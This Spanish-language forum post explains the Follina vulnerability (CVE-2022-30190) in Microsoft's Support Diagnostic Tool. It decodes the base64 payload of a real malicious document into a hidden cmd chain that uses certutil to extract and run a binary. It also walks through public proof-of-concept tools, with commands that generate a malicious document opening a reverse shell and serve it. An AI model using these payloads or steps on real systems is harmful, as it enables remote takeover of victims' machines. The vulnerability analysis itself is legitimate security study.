• Inicio
  • Buscar
  • Ingresar
  • Registrarse

    Meta Quest 3: todo lo que necesitas saber sobre las nuevas gafas de realidad virtual de Meta

    • Hack x Crack - Comunidad de Seguridad informática »
    • Seguridad Informatica »
    • Hacking »
    • Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190]
    • Imprimir
    Páginas: [1]   Ir Abajo

    Autor Tema: Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190]  (Leído 2892 veces)

    Desconectado R3LI4NT

    • { L4 } Geek
    • ****
    • Mensajes: 383
    • El poder del usuario radica en su ANONIMATO.
      • Ver Perfil
      • GitHub
    Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190]
    « en: Junio 11, 2022, 09:12:39 pm »
    A fines de mayor de 2022 unos investigadores habían descubierto una vulnerabilidad de zero-day que afecta a los usuarios de Microsoft Windows y que permite a un atacante apropiarse remotamente de la máquina víctima a través de comandos maliciosos con solamente abrir un documento de Microsoft Office. Lo más alarmante es que fue descubierta mucho antes, supuestamente en abril y misma fue reportada a Microsoft, pero este se hizo la "vista gorda" y no  le dio importancia. El investigador Nao_Sec reveló en su cuenta de twitter que le había llegado un documento malicioso con un enlace externo asociado al doc para cagar el HTML y ejecutar el código PowerShell.

    Nao_Sec se encontraba probando malwares en virustotal hasta que se encontro con el siguiente fragmento de código:



    - https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection


    Algo muy importante de esta vulnerabilidad es que no es necesario habilitar los MACROS para que el malware sea ejecutado.



    ms-msdt es una herramienta de soporte que recopila información para posteriormente ser enviada y analizada por los técnicos de Microsoft. Esta herramienta permite descargar la información  de una URL ofuscada en base64 y si nos ponemos a observar detalladamente la imagen, vemos que intenta descargar mpsigstub.exe que también es desarrollado por Microsoft para extraer los archivos  de actualización en un directorio temporal.

    El investigador subió la muestra a ANY-RUN, es decir, es un sandbox en línea para analizar la muestra de la ejecución del malware en tiempo real.



    - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/



    URL ofuscada a base64:
    Código: Text
    1.  'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='
    2.  

    Código decode base64 Python3:
    Código: Python
    1. import base64
    2.  
    3. base64_message = 'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='
    4. base64_bytes = base64_message.encode('ascii')
    5. message_bytes = base64.b64decode(base64_bytes)
    6. message = message_bytes.decode('ascii')
    7.  
    8. print(message)
    9.  

    Con bash también es posible decodificarlo:
    Código: Text
    1. echo 'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw==' | base64 --decode
    2.  



    DECODE:
    Código: Text
    1. $cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
    2.  

    Nos damos una idea de que utiliza el CMD (Comando de la terminal) para ejecutar un comando e iniciar un proceso "oculto", luego mata el proceso msdt.exe (taskkill), seguidamente ejecuta otro proceso y descarga un archivo .RAR (05-2022-0438.rar) para guardarlo dentro de una variable que contenga un string específico por medio del certutil ya que este es una de la técnicas más conocidas para ejecutar malware porque permite instalar, realizar copias de seguridad y administrar certificados de Windows. Finalmente expande el archivo y tratará de ejecutar rgb.exe.

    Microsoft entrego una guía para poder deshabilitar el protocolo de URL para que ms-msdt no pueda descargar archivos desde el exterior. Es IMPORTANTE aclarar que no se trata de un parche, sino que de un Workarounds (soluciones alternativas), la vulnerabilidad zero-day aún no tiene un parche oficial y sigue siendo explotada.

    - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

    En github ya se han publicado varios códigos para replicar la vulnerabilidad "Follina" de forma local, como por ejemplo:

    - https://github.com/chvancooten/follina.py
    - https://github.com/JohnHammond/msdt-follina

    Para poder hacer uso de él debemos clonarlo y luego especificar párametros. Para ejecutar un binario local:
    Código: Text
    1. python .\follina.py -t docx -m binary -b \windows\system32\calc.exe
    2.  

    Se genera un archivo "clickme.docx" que dentro contiene un payload que sera iniciado en el servidor web (http://localhost:80/exploit.html).



    Obtener una reverse shell:
    Código: Text
    1. git clone https://github.com/JohnHammond/msdt-follina
    2. cd msdt-follina
    3. python3 follina.py
    4. python3 follina.py --reverse 443 --interface wlan0 --output doc_malicioso.doc
    5.  



    Luego se inicia un servidor local para ser descargado y ejecutado en la máquina Windows:
    Código: Text
    1. python3 -m http.server 8080
    2. o
    3. sudo service apache2 start
    4.  





    #R3LI4NT
    « Última modificación: Junio 12, 2022, 05:45:17 pm por R3LI4NT »
    En línea

    No contesto dudas por MP, si las tienes, las planteas en el foro.

    Road To Hacking v3: https://github.com/R3LI4NT/road-to-hacking

    Desconectado poseidon

    • Moderador
    • { L4 } Geek
    • **
    • Mensajes: 356
    • Malware undetector!
      • Ver Perfil
    Re:Zero-Day Follina - Vulnerbilidad Microsoft Support Diagnostic [CVE-2022-30190]
    « Respuesta #1 en: Junio 12, 2022, 09:47:25 am »
    Un aplauso para Microsoft. XD
    En línea

    • Imprimir
    Páginas: [1]   Ir Arriba
    • Hack x Crack - Comunidad de Seguridad informática »
    • Seguridad Informatica »
    • Hacking »
    • Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190]
     

    • SMF | SMF © 2013, Simple Machines
    • XHTML
    • RSS
    • WAP2
    Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso... Learn more